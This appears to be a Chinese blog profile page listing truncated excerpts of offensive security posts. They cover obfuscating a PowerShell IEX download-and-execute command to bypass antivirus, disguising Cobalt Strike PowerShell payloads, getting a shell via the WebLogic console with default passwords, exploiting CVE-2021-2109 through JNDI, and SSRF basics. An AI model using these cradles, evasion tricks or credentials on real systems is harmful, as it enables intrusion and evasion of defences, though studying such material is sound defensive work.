- 博客(6)
- 资源 (2)
- 收藏
- 关注
原创 powershell命令语句混淆免杀(bypass火绒)
基础混淆原始语句(不免杀)powershell “IEX (New-Object System.Net.WebClient).DownloadString(‘http://127.0.0.1/a.ps1’)"AV:火绒混淆测试New-Object System.Net 类可以直接替换成 New-Object Net 类(不免杀)powershell "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/a.ps1')"
2021-02-04 17:26:15 1312
原创 CS powershell马免杀
修改原理1.杀软检测的几个点:InvokeVirtualAllockernel32.dllFormBase64StringSystem.dllfunc_get_proc_addressfunc_get_delegate_type$var_va$var_buffer$var_runme$var_code$x2.bypass方法:(1)函数名称将上面过滤的函数名,ascii编码解码后再调用(2)变量名修改变量名改版后代码把cs生成powershell脚本的shellcod
2021-02-03 11:22:52 1353
原创 Weblogic管理控制台Getshell
影响范围能访问并登录weblogic管理控制台即可:http://ip:7001/console获取控制台口令弱口令weblogic weblogicsystem passwordguest guestportaladmin portaladminadmin securityjoe passwordmary passwordsystem securitywlcsystem wlcs
2021-02-02 14:52:39 843
原创 python requests模块
python requests模块示例代码import requestsr = requests.get('https://github.com/Ranxf') # 最基本的不带参数的get请求r1 = requests.get(url='http://dict.baidu.com/s', params={'wd': 'python'}) # 带参数的get请求requests.get(‘https://github.com/timeline.json’)
2021-02-02 14:45:41 157
原创 CVE-2021-2109
漏洞检测访问url:http://xxx.xxx.xxx/console/css/%252e%252e/consolejndi.portal如果出现未授权访问则一般可以直接打了,由于这个漏洞的利用过程就需要目标服务器访问自己vps上的服务,所以只要能利用那目标肯定是要能出网的,那就是CS的战场了漏洞复现网上很多,我简单过一遍在vps上开启服务:java -jar JNDIExploit-v1.11.jar -i [vps_ip]JNDIExploit-v1.11.jar文件见附件修改一下ip
2021-02-02 14:45:29 1272
原创 SSRF漏洞
SSRF漏洞SSRF概念服务端请求伪造(Server-Side Request Forgery),指的是攻击者在未能取得服务器所有权限时,利用服务器漏洞以服务器的身份发送一条构造好的请求给服务器所在内网。SSRF攻击通常针对外部网络无法直接访问的内部系统。SSRF原理很多web应用都提供了从其他的服务器上获取数据的功能。使用指定的URL,web应用便可以获取图片,下载文件,读取文件内容等。SSRF的实质是利用存在缺陷的web应用作为代理攻击远程和本地的服务器。SSRF形成的原因大都是由于服务端提供了
2020-10-12 21:24:54 233
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人